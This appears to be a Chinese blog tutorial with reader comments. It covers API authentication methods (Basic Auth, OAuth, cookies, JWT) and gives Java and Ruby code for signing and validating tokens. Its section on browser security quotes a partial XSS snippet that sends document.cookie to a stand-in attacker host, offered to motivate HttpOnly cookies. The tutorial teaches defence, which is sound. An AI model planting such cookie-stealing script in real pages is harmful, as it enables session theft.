HTTP Basic Auth简单点说明就是每次请求API时都提供用户的username和password,简言之,Basic Auth是配合RESTful API 使用的最简单的认证方式,只需提供用户名密码即可,但由于有把用户名密码暴露给第三方客户端的风险,在生产环境下被使用的越来越少。因此,在开发对外开放的RESTful API时,尽量避免采用HTTP Basic Auth
OAuth(开放授权)是一个开放的授权标准,允许用户让第三方应用访问该用户在某一web服务上存储的私密的资源(如照片,视频,联系人列表),而无需将用户名和密码提供给第三方应用。
OAuth允许用户提供一个令牌,而不是用户名和密码来访问他们存放在特定服务提供者的数据。每一个令牌授权一个特定的第三方系统(例如,视频编辑网站)在特定的时段(例如,接下来的2小时内)内访问特定的资源(例如仅仅是某一相册中的视频)。这样,OAuth让用户可以授权第三方网站访问他们存储在另外服务提供者的某些特定信息,而非所有内容
下面是OAuth2.0的流程:
这种基于OAuth的认证机制适用于个人消费者类的互联网产品,如社交类APP等应用,但是不太适合拥有自有认证权限管理的企业应用;
Cookie认证机制就是为一次请求认证在服务端创建一个Session对象,同时在客户端的浏览器端创建了一个Cookie对象;通过客户端带上来Cookie对象来与服务器端的session对象匹配来实现状态管理的。默认的,当我们关闭浏览器的时候,cookie会被删除。但可以通过修改cookie 的expire time使cookie在一定时间内有效;
Token Auth的优点
Token机制相对于Cookie机制又有什么好处呢?
JSON Web Token(JWT)是一个非常轻巧的规范。这个规范允许我们使用JWT在用户和服务器之间传递安全可靠的信息。其
一个JWT实际上就是一个字符串,它由三部分组成,头部、载荷与签名。
载荷(Payload)
{ "iss": "Online JWT Builder",
"iat": 1416797419,
"exp": 1448333419,
"aud": "www.example.com",
"sub": "[email protected]",
"GivenName": "Johnny",
"Surname": "Rocket",
"Email": "[email protected]",
"Role": [ "Manager", "Project Administrator" ]
}
将上面的JSON对象进行[base64编码]可以得到下面的字符串。这个字符串我们将它称作JWT的Payload(载荷)。
eyJpc3MiOiJKb2huIFd1IEpXVCIsImlhdCI6MTQ0MTU5MzUwMiwiZXhwIjoxNDQxNTk0NzIyLCJhdWQiOiJ3d3cuZXhhbXBsZS5jb20iLCJzdWIiOiJqcm9ja2V0QGV4YW1wbGUuY29tIiwiZnJvbV91c2VyIjoiQiIsInRhcmdldF91c2VyIjoiQSJ9
小知识:Base64是一种基于64个可打印字符来表示二进制数据的表示方法。由于2的6次方等于64,所以每6个比特为一个单元,对应某个可打印字符。三个字节有24个比特,对应于4个Base64单元,即3个字节需要用4个可打印字符来表示。JDK 中提供了非常方便的 BASE64Encoder 和 BASE64Decoder,用它们可以非常方便的完成基于 BASE64 的编码和解码
头部(Header)
JWT还需要一个头部,头部用于描述关于该JWT的最基本的信息,例如其类型以及签名所用的算法等。这也可以被表示成一个JSON对象。
{
"typ": "JWT",
"alg": "HS256"
}
在头部指明了签名算法是HS256算法。
当然头部也要进行BASE64编码,编码后的字符串如下:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9
签名(Signature)
将上面的两个编码后的字符串都用句号.连接在一起(头部在前),就形成了:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0
最后,我们将上面拼接完的字符串用HS256算法进行加密。在加密的时候,我们还需要提供一个密钥(secret)。如果我们用mystar作为密钥的话,那么就可以得到我们加密后的内容:
rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM
最后将这一部分签名也拼接在被签名的字符串后面,我们就得到了完整的JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0.rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM
在我们的请求URL中会带上这串JWT字符串:
https://your.awesome-app.com/make-friend/?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0.rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM
下面我们从一个实例来看如何运用JWT机制实现认证:
登录
请求认证
基于Token的认证机制会在每一次请求中都带上完成签名的Token信息,这个Token信息可能在COOKIE
中,也可能在HTTP的Authorization头中;
对Token认证机制有5点直接注意的地方:
Java中对JWT的支持可以考虑使用JJWT开源库;JJWT实现了JWT, JWS, JWE 和 JWA RFC规范;下面将简单举例说明其使用:
生成Token码
import javax.crypto.spec.SecretKeySpec;
import javax.xml.bind.DatatypeConverter;
import java.security.Key;
import io.jsonwebtoken.*;
import java.util.Date;
//Sample method to construct a JWT
private String createJWT(String id, String issuer, String subject, long ttlMillis) {
//The JWT signature algorithm we will be using to sign the token
SignatureAlgorithm signatureAlgorithm = SignatureAlgorithm.HS256;
long nowMillis = System.currentTimeMillis();
Date now = new Date(nowMillis);
//We will sign our JWT with our ApiKey secret
byte[] apiKeySecretBytes = DatatypeConverter.parseBase64Binary(apiKey.getSecret());
Key signingKey = new SecretKeySpec(apiKeySecretBytes, signatureAlgorithm.getJcaName());
//Let's set the JWT Claims
JwtBuilder builder = Jwts.builder().setId(id)
.setIssuedAt(now)
.setSubject(subject)
.setIssuer(issuer)
.signWith(signatureAlgorithm, signingKey);
//if it has been specified, let's add the expiration
if (ttlMillis >= 0) {
long expMillis = nowMillis + ttlMillis;
Date exp = new Date(expMillis);
builder.setExpiration(exp);
}
//Builds the JWT and serializes it to a compact, URL-safe string
return builder.compact();
}
解码和验证Token码
import javax.xml.bind.DatatypeConverter;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.Claims;
//Sample method to validate and read the JWT
private void parseJWT(String jwt) {
//This line will throw an exception if it is not a signed JWS (as expected)
Claims claims = Jwts.parser()
.setSigningKey(DatatypeConverter.parseBase64Binary(apiKey.getSecret()))
.parseClaimsJws(jwt).getBody();
System.out.println("ID: " + claims.getId());
System.out.println("Subject: " + claims.getSubject());
System.out.println("Issuer: " + claims.getIssuer());
System.out.println("Expiration: " + claims.getExpiration());
}
如何保证用户名/密码验证过程的安全性;因为在验证过程中,需要用户输入用户名和密码,在这一过程中,用户名、密码等敏感信息需要在网络中传输。因此,在这个过程中建议采用HTTPS,通过SSL加密传输,以确保通道的安全性。
浏览器可以做很多事情,这也给浏览器端的安全带来很多隐患,最常见的如:XSS攻击:跨站脚本攻击(Cross Site Scripting);如果有个页面的输入框中允许输入任何信息,且没有做防范措施,如果我们输入下面这段代码:
a.src='https://hackmeplz.com/yourCookies.png/?cookies=’
+document.cookie;return a}())"
这段代码会盗取你域中的所有cookie信息,并发送到 hackmeplz.com;那么我们如何来防范这种攻击呢?
//设置cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
//设置多个cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
response.addHeader("Set-Cookie", "timeout=30; Path=/test; HttpOnly");
//设置https的cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; Secure; HttpOnly");
在实际使用中,我们可以使FireCookie查看我们设置的Cookie 是否是HttpOnly;
所谓重放攻击就是攻击者发送一个目的主机已接收过的包,来达到欺骗系统的目的,主要用于身份认证过程。比如在浏览器端通过用户名/密码验证获得签名的Token被木马窃取。即使用户登出了系统,黑客还是可以利用窃取的Token模拟正常请求,而服务器端对此完全不知道,以为JWT机制是无状态的。
针对这种情况,有几种常用做法可以用作参考:
1、时间戳 +共享秘钥
这种方案,客户端和服务端都需要知道:
客户端
auth_header = JWT.encode({
user_id: 123,
iat: Time.now.to_i, # 指定token发布时间
exp: Time.now.to_i + 2 # 指定token过期时间为2秒后,2秒时间足够一次HTTP请求,同时在一定程度确保上一次token过期,减少replay attack的概率;
}, "")
RestClient.get("http://api.example.com/", authorization: auth_header)
服务端
class ApiController < ActionController::Base
attr_reader :current_user
before_action :set_current_user_from_jwt_token
def set_current_user_from_jwt_token
# Step 1:解码JWT,并获取User ID,这个时候不对Token签名进行检查
# the signature. Note JWT tokens are *not* encrypted, but signed.
payload = JWT.decode(request.authorization, nil, false)
# Step 2: 检查该用户是否存在于数据库
@current_user = User.find(payload['user_id'])
# Step 3: 检查Token签名是否正确.
JWT.decode(request.authorization, current_user.api_secret)
# Step 4: 检查 "iat" 和"exp" 以确保这个Token是在2秒内创建的.
now = Time.now.to_i
if payload['iat'] > now || payload['exp'] < now
# 如果过期则返回401
end
rescue JWT::DecodeError
# 返回 401
end
end
2、时间戳 +共享秘钥+黑名单 (类似Zendesk的做法)
客户端
auth_header = JWT.encode({
user_id: 123,
jti: rand(2 << 64).to_s, # 通过jti确保一个token只使用一次,防止replace attack
iat: Time.now.to_i, # 指定token发布时间.
exp: Time.now.to_i + 2 # 指定token过期时间为2秒后
}, "")
RestClient.get("http://api.example.com/", authorization: auth_header)
服务端
def set_current_user_from_jwt_token
# 前面的步骤参考上面
payload = JWT.decode(request.authorization, nil, false)
@current_user = User.find(payload['user_id'])
JWT.decode(request.authorization, current_user.api_secret)
now = Time.now.to_i
if payload['iat'] > now || payload['exp'] < now
# 返回401
end
# 下面将检查确保这个JWT之前没有被使用过
# 使用Redis的原子操作
# The redis 的键: :
key = "#{payload['user_id']}:#{payload['jti']}"
# 看键值是否在redis中已经存在. 如果不存在则返回nil. 如果存在则返回“1”. .
if redis.getset(key, "1")
# 返回401
#
end
# 进行键值过期检查
redis.expireat(key, payload['exp'] + 2)
end
所谓MITM攻击,就是在客户端和服务器端的交互过程被监听,比如像可以上网的咖啡馆的WIFI被监听或者被黑的代理服务器等;
针对这类攻击的办法使用HTTPS,包括针对分布式应用,在服务间传输像cookie这类敏感信息时也采用HTTPS;所以云计算在本质上是不安全的。
参考目录:
https://stormpath.com/blog/build-secure-user-interfaces-using-jwts
https://auth0.com/blog/2014/01/27/ten-things-you-should-know-about-tokens-and-cookies/
https://www.quora.com/Is-JWT-JSON-Web-Token-insecure-by-design
https://github.com/auth0/node-jsonwebtoken/issues/36
http://christhorntonsf.com/secure-your-apis-with-jwt/
分类: Web
好文要顶 关注我 收藏该文
红心李
关注 - 4
粉丝 - 145
+加关注
83
0
« 上一篇:MySQL主键设计
posted @ 2016-06-22 15:25 红心李 阅读(75517) 评论(29) 编辑 收藏
评论列表
#1楼 2016-06-22 15:57 DownUp
赞,支持下 ,很全面
支持(0)反对(0)
#2楼 2016-06-22 19:19 Esofar
mark
支持(0)反对(0)
http://pic.cnblogs.com/face/785976/20170106142840.png
#3楼 2016-06-22 21:31 一别经年
对于前后端分离来说JWT身份验证很有用!
支持(0)反对(0)
http://pic.cnblogs.com/face/545336/20150110092335.png
#4楼 2016-06-23 13:13 sunjie
mark
支持(0)反对(0)
#5楼 2016-06-23 17:36 程序诗人
mark
支持(0)反对(0)
http://pic.cnblogs.com/face/47012/20131031113822.png
#6楼 2016-06-24 00:06 我不清楚是谁
可以的
支持(0)反对(0)
#7楼 2016-06-24 09:24 _tom
mark 刚好在学oauth机制
支持(0)反对(0)
http://pic.cnblogs.com/face/426186/20160801090623.png
#8楼 2016-06-24 09:44 伍华聪
我的混合框架中的Web API就是基于JWT的机制生成Token的,异曲同工之妙,呵呵。
支持(1)反对(0)
http://pic.cnblogs.com/face/u8867.png
#9楼 2016-06-24 09:55 荆棘人
挺全面很不错,学习了!谢谢楼主!
支持(0)反对(0)
#10楼 2016-06-24 10:02 ↖(^o^)↗
前两天看了篇英文的,懵懵懂懂的。楼主马上弄出个更详细的,顶一个!!!
支持(0)反对(0)
#11楼 2016-06-24 10:21 longware
cas
支持(0)反对(0)
http://pic.cnblogs.com/face/u79428.gif
#12楼 2016-06-24 13:18 sparkdev
收藏,学习中
支持(0)反对(0)
http://pic.cnblogs.com/face/952033/20160916141655.png
#13楼 2016-06-24 14:16 心尖偏左
mark
支持(0)反对(0)
http://pic.cnblogs.com/face/785677/20150726163334.png
#14楼 2016-06-29 18:30 疯狂地SL
mark
支持(0)反对(0)
#15楼 2016-08-06 00:58 平常心成大事
看了后面关于防范"重放攻击"的方案, 我想问一下, 每次在请求目标api之前, 都要重新获取一次token 吗?
支持(0)反对(0)
#16楼 2016-08-09 14:55 HansonWu
@伍华聪
哥 能讲一下啊你是怎么做的吗,我是新手,正接触这块的设计。
支持(0)反对(0)
#17楼 2016-08-25 03:42 sadkilo
@红心李
关于防范Replay Attacks
客户端生产时间戳,限制token 2秒内有效;然后服务端验证是否超时,
有一个问题: 如果客户端跟服务端的时间不同步,那岂不是客户端永远都无法被服务端承认了?
支持(3)反对(0)
http://pic.cnblogs.com/face/594871/20151024005932.png
#18楼 2016-09-08 15:04 clem
总结得很好,谢谢啦!
支持(0)反对(0)
#19楼 2017-04-14 12:00 烛煌
请问JWT签名放在cookie中怎么实现跨域?比如我Domain1登入了,Domain2中的cookie还是没有签名,一样会跳转到登入页?
支持(1)反对(0)
http://pic.cnblogs.com/face/u436034.jpg?id=09173532
#20楼 2017-05-02 20:32 MelloChan
apiKey.getSecret()
???? apiKey在哪?
支持(1)反对(0)
http://pic.cnblogs.com/face/1016331/20160901103412.png
#21楼 2017-05-25 09:03 长风之子
这种实现机制,可以针对webapi,也可以针对web浏览器中的页面,如果使用header增加jwt token的方法,可以实现跨域,但如果使用web浏览器是基于cookie机制的,如何定现跨域?望大神赐教
支持(0)反对(0)
#22楼 2017-06-02 16:51 DZG123
作者是要 靠 别人来问 apiKey是什么嘛?
支持(0)反对(0)
#23楼 2017-06-05 18:38 花儿笑弯了腰
可以
支持(0)反对(0)
http://pic.cnblogs.com/face/365537/20140218233545.png
#24楼 2017-06-20 19:50 keepflyer
好干货
支持(0)反对(0)
#25楼 2017-06-26 09:45 3dx退之
Nice
支持(0)反对(0)
http://pic.cnblogs.com/face/1178626/20170607133955.png
#26楼 2017-07-10 17:18 glbfor
auth_header = JWT.encode({
user_id: 123,
iat: Time.now.to_i, # 指定token发布时间
exp: Time.now.to_i + 2 # 指定token过期时间为2秒后,2秒时间足够一次HTTP请求,同时在一定程度确保上一次token过期,减少replay attack的概率;
}, "
RestClient.get("http://api.example.com/", authorization: auth_header)
请问,这个payload里面是不是漏了token。
不然,一旦秘钥被窃取,就脱缰了。。
支持(0)反对(0)
#27楼 2017-07-10 17:32 glbfor
@长风之子
1.使用redis共享session。
2.服务端设为支持多个域。
3.自定义sessionid生成读取。 不使用容器session机制。
4.同时支持cookie或url参数作为token载体。
5.读取参数token或者cookie跟redis内容匹配,校验。
6.后面就一致了
支持(0)反对(0)
#28楼 2017-07-10 17:33 glbfor
@sadkilo
所以,使用UTC很重要。只要保持服务器有时间服务器就好了。
支持(0)反对(0)
#29楼37365942017/7/17 10:21:23 2017-07-17 10:21 梁少少
楼主,这个Date exp = new Date(expMillis);
builder.setExpiration(exp);过期时间可以累加么,就是下次访问的时候,过期时间要重新设置累加!怎么弄呢?
现在时间一到期,Claims claims = Jwts.parser()
.setSigningKey(DatatypeConverter.parseBase64Binary(apiKey.getSecret()))
.parseClaimsJws(jwt).getBody();
这一段解析就报错。。。
还有,怎么进行token的判断是否有效或者无效,是否过期?
支持(0)反对(0)
刷新评论刷新页面返回顶部
注册用户登录后才能发表评论,请 登录 或 注册,访问网站首页。
【推荐】50万行VC++源码: 大型组态工控、电力仿真CAD与GIS源码库
【免费】从零开始学编程,开发者专属实验平台免费实践!
【推荐】现在注册又拍云,首月可享 200G CDN流量,还可免费申请 SSL 证书
最新IT新闻:
· 苹果庆祝表情包日 这些emoji今秋登陆iOS和macOS
· 对标小黄车!摩拜牵手综艺王牌节目:新款单程来袭
· 高通拒向欧盟提供芯片定价信息 或每日被罚66.5万美元
· 特斯拉自动驾驶突然抽风:加速翻车致全车5人受伤
· 小米与三星签署协议 为明年旗舰机采购6英寸OLED屏
» 更多新闻...
最新知识库文章:
· 小printf的故事:什么是真正的程序员?
· 程序员的工作、学习与绩效
· 软件开发为什么很难
· 唱吧DevOps的落地,微服务CI/CD的范本技术解读
· 程序员,如何从平庸走向理想?
» 更多知识库文章...